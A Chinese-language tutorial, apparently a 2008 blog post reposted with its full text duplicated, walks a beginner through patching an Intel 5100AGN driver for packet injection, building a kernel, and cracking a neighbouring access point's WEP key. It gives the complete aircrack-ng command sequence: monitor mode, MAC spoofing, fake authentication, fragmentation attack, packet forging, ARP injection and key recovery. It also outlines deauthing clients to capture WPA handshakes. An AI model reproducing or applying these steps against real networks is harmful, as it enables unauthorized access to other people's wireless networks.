2023年7月31日发(作者:)
Linux下使用Intel WiFi Link 5100AGN 破解WEP密码 ID:draapho 别名:mousie 2008年12月4日 撰写此文 前言 之前写过一篇《XP下使用Intel WiFi Link 5100AGN 破解WEP密码》的文章,但毕竟限制条件太多,破解速度太慢。经过google,还是google,非常幸运的走过了Ubuntu Linux的安装,终端中敲指令,对网卡驱动打补丁,升级内核,最终成功了有资格写下这篇菜鸟级别的文章了。Linux高手请无视,因为我还是一个对cd指令都要google的超级菜菜鸟…… 说明文中的红色字体都是在终端(shell)中要输入的内容。 本文参考的非常重要的三个网站如下: 1. /?p=linux/kernel/git/linville/wireless‐;a=commit;h=84e8e77f618f589316e83dfa1bfafe5a47bf0bd2 该网站为5100AGN提供了支持注入的驱动升级,提供了C源代码 和 diff文件。 2. /aircrackng/forum/?topic=4217.0 该网站验证了5100AGN能工作于注入模式,并提供升级网卡驱动的思路。 3. 中国无线论坛网,着重参考了“中卫”写的《BT3破解无线WEP/WPA教程》。 测试环境说明 1.
2.
3.
4.
5.
测试目的: 破解WEP密码 测试系统: Ubuntu Linux 8.10 测试网卡: Intel WiFi Link 5100AGN 破解软件: aircrack 网卡驱动: Stefanik Gábor 2008年9月23日写的驱动 XP下的准备工作 Linux下当然都能完成这些准备工作,不过是菜鸟么,怎么熟悉怎么来。 1. 安装Ubuntu 8.10,新手建议在Windows下使用wubi直接安装,非常非常的方便! 2. /pub/linux/kernel/v2.6/ 选择 linux‐ 下载。当然日后更新的内核版本应该也能使用,目前能确认的是2.6.27‐rc7,2.6.27‐rc8的内核版本都能使用。 3. /?p=linux/kernel/git/linville/wireless‐;a=commit;h=84e8e77f618f589316e83dfa1bfafe5a47bf0bd2 下载3个支持注入的5100AGN的驱动源文件,名字为iwl‐agn.c和iwl‐sta.c以及 iwl‐tx.c。 4. 为图方便,可以在XP下查看好要破解WEP的SSID、MAC地址、工作信道等信息,并用txt文件保存好。 Ubuntu下的准备工作 1. 装好的Ubuntu网卡驱动是直接支持5100AGN的,只是不能工作在注入模式。首先还是需要一个可用的网络来下载点东西。 2. 进入root权限。Ubuntu默认情况不允许用root帐户登陆,获得root权限的方法很多,讲个对日后操作最方便的方法。 首先,打开终端,输入指令sudo passwd root,设置新的root帐户密码。 然后在左上角点击System‐>Preferences‐>Login Window菜单,选择Security选项, 接着选中其中的“Allow Local system administrator login”选项,确认设置。 最后Ctrl+Alt+退格,输入root及密码重新登陆即可。 这样就永久获得了root权限,可以在Ubuntu中随意的用鼠标拷贝粘贴文件了。 3. sudo apt‐get install aircrack,安装破解软件aircrack 4. 下载一些配置要用的软件(如果并不想自己配置内核,可跳过) sudo apt‐get install build‐essential bin86 kernel‐package sudo apt‐get install libqt3‐headers libqt3‐mt‐dev 5. 稍等片刻,全部下载安装完成后,开始更新网卡驱动,编译Linux内核。 打开并解压缩下载的linux‐2.6.27.7的内核,把解压后的文件整个拷贝到 /usr/src的目录下。在这个目录下,还会有几个别的版本的内核文件在呢。 打开这个新内核 /drivers/net/wireless/iwlwifi/,用下载的支持注入的iwl‐agn.c和iwl‐sta.c以及iwl‐tx.c三个文件覆盖掉原来的文件。 6. sudo mv linux ,确保没有叫linux的这个链接(好像和快捷方式的概念差不多) sudo ln ‐s ./linux‐2.6.27.7 linux,把下载的新内核链接到linux cd linux,进入linux这个目录 7. 配置内核。配置内核是件困难的事情!参数繁多,一不小心就会导致升级失败。所以基本思路是把当前内核配置文件拷贝过来一用。 sudo cp /boot/config‐`uname ‐r` .config,复制当前的内核配置。 sudo make xconfig,当然如果想自己再看看配置,微调一下也可以。然后会弹出一个配置内核的窗口,对配置内核感兴趣的google,我基本没改。 8. 弄了份现成的配置文件,下一步就是编译了。为以后升级方便,先打包成deb包。 cd /usr/src/linux sudo ‐s –H make‐kpkg clean sudo make‐kpkg ‐‐initrd –revision=diy1 kernel_image kernel_headers 最后行输入完毕后,编译需要一个多小时,在确认开始编译后,该干吗干吗去! 9. 安装新的内核。在你的耐心差不多消磨至尽的时候,破解的准备工作也到了最后一步了。 sudo dpkg ‐i /usr/src/kernel‐image‐2.6.27.7*.deb,安装内核包 sudo dpkg ‐i /usr/src/kernel‐headers‐2.6.27.7*.deb,安装内核headers包 也非常有必要到/usr/src中把这两个deb文件给拷贝出来,下次重装Linux升级可就不用这么麻烦了。 sudo dpkg -i <name of the file>,设置grub默认引导
现在重启一下,如果顺利,会自动进入2.6.27.7的新内核。 破解WEP密码 1. 做了这么多准备工作,终于可以开始动手做想做的事情了。建议大家先别急着输指令,可以新建个文本文件,把要输入的指令,要破解的SSID号,MAC地址,信道等等全部安安心心的用拷贝、粘贴大法全部清晰的输入好。 2. 新建一个终端 sudo –s 可省,输入密码后,进入root权限。 lsmod 可省,查看驱动列表。反馈信息如下,可以在里面找到5100AGN的驱动。 Module Size Used by nls_iso8859_1 12288 1 nls_cp437 13952 1 vfat 18816 1 fat 57504 1 vfat ............ modinfo iwlagn 可省,查看网卡驱动的详情。反馈信息如下。 filename: /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/ alias: iwl4965 license: GPL author: Copyright(c) 2003‐2008 Intel Corporation version: 1.3.27ks description: Intel(R) Wireless WiFi Link AGN driver for Linux firmware: iwlwifi‐4965‐ srcversion: xxxxxxxxxxxxxxxxxxxxxxx ifconfig –a 可省,查看本机网卡详情。反馈信息如下 eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:219 Base address:0x8000 Lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:246 errors:0 dropped:0 overruns:0 frame:0 TX packets:246 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:15408 (15.4 KB) TX bytes:15408 (15.4 KB) pan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx UP BROADCAST MULTICAST MTU:1492 Metric:1 RX packets:19 errors:0 dropped:0 overruns:0 frame:0 TX packets:20 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5188 (5.1 KB) TX bytes:3895 (3.8 KB) wmaster0 Link encap:UNSPEC HWaddr xx‐xx‐xx‐xx‐…… UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 特别关注下深绿色标注的地方,wlan0为网卡代号,xx:xx:xx:xx:xx:xx为本机MAC。 airmon‐ng 可省,查看本机的网卡。反馈信息如下 Interface Chipset Driver wlan0 iwlagn ‐ [phy0] macchanger –m 00:11:22:33:44:55 wlan0 可省,修改自己网卡的MAC地址。当对方设置了MAC地址过滤时才有必要用吧,要用的话需要下载一下的。 airmon‐ng start wlan0 6 必须的!让网卡在信道6处监听信息。数字6就是要破解AP的工作信道(channel)。 Interface Chipset Driver wlan0 iwlagn ‐ [phy0] (monitor mode enabled on mon0) 会返回一个mon0处于监听模式的提示,输入第二次的话会变成mon1,类推。 aireplay‐ng ‐9 mon0 可选,测试注入攻击。如果测试通过,破解WEP就易如反掌了。反馈信息如下 21:00:55 Trying broadcast probe 21:00:55 Injection is working! 21:00:56 Found 3 APs …… 如果第二行返回值是No Answer,可能原因有很多,其中包括网卡驱动的问题。 如果第二行返回值是Injection is working,就说明网卡已经工作在注入攻击模式下。 然后软件会去ping每个找到的AP,这里可以得到信道上所有AP的SSID、MAC、信道、信号强度等等。 airodump‐ng –ivs –w name –c 6 mon0 必须的!抓ivs包,name为储存文件的名字,6为信道,然后会有个一直在抓包的界面 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES xx:xx:xx:xx:xx:xx 179 3 159 0 0 6 54. WEP WEP T 特别关注 #Data 这栏,它的值就是抓到的ivs的数量,目前涨的很慢,当我们在第二个终端中敲几个指令后,就会发现它涨的飞快,过了1万,就可以用第三个终端来破解密码了! 3. 新建第二个终端,不要关掉第一个终端! aireplay‐ng ‐1 0 ‐e TP‐LINK ‐a ‐h 1 mon0 必须的!进行伪装链接,TP‐LINK为要破解AP的SSID,为要破解AP的MAC地址,1为本机网卡的MAC地址,如果用macchanger伪装过,就输入伪装后的MAC地址。 aireplay‐ng ‐5 ‐b ‐h 1 mon0 必须的!获得至关重要的xor文件,参数说明同上个指令。需要一点点抓有效包的时间。 成功以后输入y,会得到一个fragment‐XXXXX‐的文件,XXXXX是数字。 packetforge‐ng ‐0 ‐a ‐h 1 ‐k 255.255.255.255 ‐l 255.255.255.255 ‐y fragment‐XXXXX‐ ‐w mrarp 必须的!参数说明同上个指令。fragment‐XXXXX‐就是上个指令中获得的文件。 aireplay‐ng ‐2 ‐r mrarp ‐x 1024 mon0 必须的!注入攻击。 此时第一个终端内的#Data栏的值应该在飞速增长。 4. 新建第三个终端,前两个终端都不要关闭。 在 #Data栏的数据达到10000以上时,就可以破解了。 aircrack‐ng ‐n 64 ‐b name‐ 必须的!破解WEP密码,是要破解AP的MAC地址。 一般地,几秒内密码就出来了。如果对方的密码设置的比较牛,多抓些ivs包后再破解即可。保存好WEP密码,退出三个终端。 破解WPA密码 要破解WPA密码,必须要抓到握手协议包。这个不难,基本思路是在有客户端的情况下攻击该客户端使其断线,然后监听其重新联网时的握手协议包。可参考中国无线论坛网 “中卫”写的《BT3破解无线WEP/WPA教程》。 但WPA只能暴力破解,如果没有任何关于密码的信息。光数字加小写字母的8位密码字典就能有几G大小,要穷举这些密码,现在的电脑速度还远远不够。所以在没有任何关于密码信息的情况下,要破解WPA只能是浮云……这里也就没必要多介绍了。 破解WEP密码总结 本人研究WEP密码破解就此告一段落。从一个完全对破解和Linux一窍不通的人,通过论坛,google,到目前基本弄清了无线网加密技术及破解方法的基本思路和一些皮毛,还是小有成就的。而意外接触Ubuntu更是让我对Linux兴趣大增,没想到Linux已经变得如此方便!以前望而却步的内核编译也算比较顺利的完成了,当然没玩什么配置,不过有了第一次成功的体验,以后也就敢于慢慢深入了。 这次用5100AGN破解WEP密码最大的收获就是:如果想做一件事情,就多做少说,潜心研究!尤其作为菜鸟,要少发问,多实践,有信心和耐心来攻破难题,定能成功! 全文完
2023年7月31日发(作者:)
Linux下使用Intel WiFi Link 5100AGN 破解WEP密码 ID:draapho 别名:mousie 2008年12月4日 撰写此文 前言 之前写过一篇《XP下使用Intel WiFi Link 5100AGN 破解WEP密码》的文章,但毕竟限制条件太多,破解速度太慢。经过google,还是google,非常幸运的走过了Ubuntu Linux的安装,终端中敲指令,对网卡驱动打补丁,升级内核,最终成功了有资格写下这篇菜鸟级别的文章了。Linux高手请无视,因为我还是一个对cd指令都要google的超级菜菜鸟…… 说明文中的红色字体都是在终端(shell)中要输入的内容。 本文参考的非常重要的三个网站如下: 1. /?p=linux/kernel/git/linville/wireless‐;a=commit;h=84e8e77f618f589316e83dfa1bfafe5a47bf0bd2 该网站为5100AGN提供了支持注入的驱动升级,提供了C源代码 和 diff文件。 2. /aircrackng/forum/?topic=4217.0 该网站验证了5100AGN能工作于注入模式,并提供升级网卡驱动的思路。 3. 中国无线论坛网,着重参考了“中卫”写的《BT3破解无线WEP/WPA教程》。 测试环境说明 1.
2.
3.
4.
5.
测试目的: 破解WEP密码 测试系统: Ubuntu Linux 8.10 测试网卡: Intel WiFi Link 5100AGN 破解软件: aircrack 网卡驱动: Stefanik Gábor 2008年9月23日写的驱动 XP下的准备工作 Linux下当然都能完成这些准备工作,不过是菜鸟么,怎么熟悉怎么来。 1. 安装Ubuntu 8.10,新手建议在Windows下使用wubi直接安装,非常非常的方便! 2. /pub/linux/kernel/v2.6/ 选择 linux‐ 下载。当然日后更新的内核版本应该也能使用,目前能确认的是2.6.27‐rc7,2.6.27‐rc8的内核版本都能使用。 3. /?p=linux/kernel/git/linville/wireless‐;a=commit;h=84e8e77f618f589316e83dfa1bfafe5a47bf0bd2 下载3个支持注入的5100AGN的驱动源文件,名字为iwl‐agn.c和iwl‐sta.c以及 iwl‐tx.c。 4. 为图方便,可以在XP下查看好要破解WEP的SSID、MAC地址、工作信道等信息,并用txt文件保存好。 Ubuntu下的准备工作 1. 装好的Ubuntu网卡驱动是直接支持5100AGN的,只是不能工作在注入模式。首先还是需要一个可用的网络来下载点东西。 2. 进入root权限。Ubuntu默认情况不允许用root帐户登陆,获得root权限的方法很多,讲个对日后操作最方便的方法。 首先,打开终端,输入指令sudo passwd root,设置新的root帐户密码。 然后在左上角点击System‐>Preferences‐>Login Window菜单,选择Security选项, 接着选中其中的“Allow Local system administrator login”选项,确认设置。 最后Ctrl+Alt+退格,输入root及密码重新登陆即可。 这样就永久获得了root权限,可以在Ubuntu中随意的用鼠标拷贝粘贴文件了。 3. sudo apt‐get install aircrack,安装破解软件aircrack 4. 下载一些配置要用的软件(如果并不想自己配置内核,可跳过) sudo apt‐get install build‐essential bin86 kernel‐package sudo apt‐get install libqt3‐headers libqt3‐mt‐dev 5. 稍等片刻,全部下载安装完成后,开始更新网卡驱动,编译Linux内核。 打开并解压缩下载的linux‐2.6.27.7的内核,把解压后的文件整个拷贝到 /usr/src的目录下。在这个目录下,还会有几个别的版本的内核文件在呢。 打开这个新内核 /drivers/net/wireless/iwlwifi/,用下载的支持注入的iwl‐agn.c和iwl‐sta.c以及iwl‐tx.c三个文件覆盖掉原来的文件。 6. sudo mv linux ,确保没有叫linux的这个链接(好像和快捷方式的概念差不多) sudo ln ‐s ./linux‐2.6.27.7 linux,把下载的新内核链接到linux cd linux,进入linux这个目录 7. 配置内核。配置内核是件困难的事情!参数繁多,一不小心就会导致升级失败。所以基本思路是把当前内核配置文件拷贝过来一用。 sudo cp /boot/config‐`uname ‐r` .config,复制当前的内核配置。 sudo make xconfig,当然如果想自己再看看配置,微调一下也可以。然后会弹出一个配置内核的窗口,对配置内核感兴趣的google,我基本没改。 8. 弄了份现成的配置文件,下一步就是编译了。为以后升级方便,先打包成deb包。 cd /usr/src/linux sudo ‐s –H make‐kpkg clean sudo make‐kpkg ‐‐initrd –revision=diy1 kernel_image kernel_headers 最后行输入完毕后,编译需要一个多小时,在确认开始编译后,该干吗干吗去! 9. 安装新的内核。在你的耐心差不多消磨至尽的时候,破解的准备工作也到了最后一步了。 sudo dpkg ‐i /usr/src/kernel‐image‐2.6.27.7*.deb,安装内核包 sudo dpkg ‐i /usr/src/kernel‐headers‐2.6.27.7*.deb,安装内核headers包 也非常有必要到/usr/src中把这两个deb文件给拷贝出来,下次重装Linux升级可就不用这么麻烦了。 sudo dpkg -i <name of the file>,设置grub默认引导
现在重启一下,如果顺利,会自动进入2.6.27.7的新内核。 破解WEP密码 1. 做了这么多准备工作,终于可以开始动手做想做的事情了。建议大家先别急着输指令,可以新建个文本文件,把要输入的指令,要破解的SSID号,MAC地址,信道等等全部安安心心的用拷贝、粘贴大法全部清晰的输入好。 2. 新建一个终端 sudo –s 可省,输入密码后,进入root权限。 lsmod 可省,查看驱动列表。反馈信息如下,可以在里面找到5100AGN的驱动。 Module Size Used by nls_iso8859_1 12288 1 nls_cp437 13952 1 vfat 18816 1 fat 57504 1 vfat ............ modinfo iwlagn 可省,查看网卡驱动的详情。反馈信息如下。 filename: /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/ alias: iwl4965 license: GPL author: Copyright(c) 2003‐2008 Intel Corporation version: 1.3.27ks description: Intel(R) Wireless WiFi Link AGN driver for Linux firmware: iwlwifi‐4965‐ srcversion: xxxxxxxxxxxxxxxxxxxxxxx ifconfig –a 可省,查看本机网卡详情。反馈信息如下 eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:219 Base address:0x8000 Lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:246 errors:0 dropped:0 overruns:0 frame:0 TX packets:246 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:15408 (15.4 KB) TX bytes:15408 (15.4 KB) pan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx UP BROADCAST MULTICAST MTU:1492 Metric:1 RX packets:19 errors:0 dropped:0 overruns:0 frame:0 TX packets:20 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5188 (5.1 KB) TX bytes:3895 (3.8 KB) wmaster0 Link encap:UNSPEC HWaddr xx‐xx‐xx‐xx‐…… UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 特别关注下深绿色标注的地方,wlan0为网卡代号,xx:xx:xx:xx:xx:xx为本机MAC。 airmon‐ng 可省,查看本机的网卡。反馈信息如下 Interface Chipset Driver wlan0 iwlagn ‐ [phy0] macchanger –m 00:11:22:33:44:55 wlan0 可省,修改自己网卡的MAC地址。当对方设置了MAC地址过滤时才有必要用吧,要用的话需要下载一下的。 airmon‐ng start wlan0 6 必须的!让网卡在信道6处监听信息。数字6就是要破解AP的工作信道(channel)。 Interface Chipset Driver wlan0 iwlagn ‐ [phy0] (monitor mode enabled on mon0) 会返回一个mon0处于监听模式的提示,输入第二次的话会变成mon1,类推。 aireplay‐ng ‐9 mon0 可选,测试注入攻击。如果测试通过,破解WEP就易如反掌了。反馈信息如下 21:00:55 Trying broadcast probe 21:00:55 Injection is working! 21:00:56 Found 3 APs …… 如果第二行返回值是No Answer,可能原因有很多,其中包括网卡驱动的问题。 如果第二行返回值是Injection is working,就说明网卡已经工作在注入攻击模式下。 然后软件会去ping每个找到的AP,这里可以得到信道上所有AP的SSID、MAC、信道、信号强度等等。 airodump‐ng –ivs –w name –c 6 mon0 必须的!抓ivs包,name为储存文件的名字,6为信道,然后会有个一直在抓包的界面 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES xx:xx:xx:xx:xx:xx 179 3 159 0 0 6 54. WEP WEP T 特别关注 #Data 这栏,它的值就是抓到的ivs的数量,目前涨的很慢,当我们在第二个终端中敲几个指令后,就会发现它涨的飞快,过了1万,就可以用第三个终端来破解密码了! 3. 新建第二个终端,不要关掉第一个终端! aireplay‐ng ‐1 0 ‐e TP‐LINK ‐a ‐h 1 mon0 必须的!进行伪装链接,TP‐LINK为要破解AP的SSID,为要破解AP的MAC地址,1为本机网卡的MAC地址,如果用macchanger伪装过,就输入伪装后的MAC地址。 aireplay‐ng ‐5 ‐b ‐h 1 mon0 必须的!获得至关重要的xor文件,参数说明同上个指令。需要一点点抓有效包的时间。 成功以后输入y,会得到一个fragment‐XXXXX‐的文件,XXXXX是数字。 packetforge‐ng ‐0 ‐a ‐h 1 ‐k 255.255.255.255 ‐l 255.255.255.255 ‐y fragment‐XXXXX‐ ‐w mrarp 必须的!参数说明同上个指令。fragment‐XXXXX‐就是上个指令中获得的文件。 aireplay‐ng ‐2 ‐r mrarp ‐x 1024 mon0 必须的!注入攻击。 此时第一个终端内的#Data栏的值应该在飞速增长。 4. 新建第三个终端,前两个终端都不要关闭。 在 #Data栏的数据达到10000以上时,就可以破解了。 aircrack‐ng ‐n 64 ‐b name‐ 必须的!破解WEP密码,是要破解AP的MAC地址。 一般地,几秒内密码就出来了。如果对方的密码设置的比较牛,多抓些ivs包后再破解即可。保存好WEP密码,退出三个终端。 破解WPA密码 要破解WPA密码,必须要抓到握手协议包。这个不难,基本思路是在有客户端的情况下攻击该客户端使其断线,然后监听其重新联网时的握手协议包。可参考中国无线论坛网 “中卫”写的《BT3破解无线WEP/WPA教程》。 但WPA只能暴力破解,如果没有任何关于密码的信息。光数字加小写字母的8位密码字典就能有几G大小,要穷举这些密码,现在的电脑速度还远远不够。所以在没有任何关于密码信息的情况下,要破解WPA只能是浮云……这里也就没必要多介绍了。 破解WEP密码总结 本人研究WEP密码破解就此告一段落。从一个完全对破解和Linux一窍不通的人,通过论坛,google,到目前基本弄清了无线网加密技术及破解方法的基本思路和一些皮毛,还是小有成就的。而意外接触Ubuntu更是让我对Linux兴趣大增,没想到Linux已经变得如此方便!以前望而却步的内核编译也算比较顺利的完成了,当然没玩什么配置,不过有了第一次成功的体验,以后也就敢于慢慢深入了。 这次用5100AGN破解WEP密码最大的收获就是:如果想做一件事情,就多做少说,潜心研究!尤其作为菜鸟,要少发问,多实践,有信心和耐心来攻破难题,定能成功! 全文完
发布评论